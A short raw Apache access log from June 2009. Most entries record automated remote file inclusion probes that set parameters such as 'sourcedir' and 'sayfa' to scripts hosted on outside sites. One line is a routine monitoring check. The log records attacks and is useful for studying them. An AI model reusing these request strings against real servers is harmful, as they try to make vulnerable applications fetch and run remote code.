216.97.239.130 - - [15/Jun/2009:03:14:47 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.819"
216.97.239.130 - - [15/Jun/2009:03:14:48 -0400] "GET /?sourcedir=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.819"
216.97.239.130 - - [15/Jun/2009:03:14:48 -0400] "GET /logs/?sourcedir=http://aldeanos.com/WEB-INF/lib/.../id.txt?? HTTP/1.1" 200 5572 "-" "libwww-perl/5.819"
209.59.12.99 - - [15/Jun/2009:03:14:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.112.121.225 - - [15/Jun/2009:03:14:59 -0400] "GET /logs/error_log.Q109051700/index.php?sayfa=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:15:01 -0400] "GET //main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
84.201.208.50 - - [15/Jun/2009:03:15:01 -0400] "GET /logs//main.php?sayfa=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
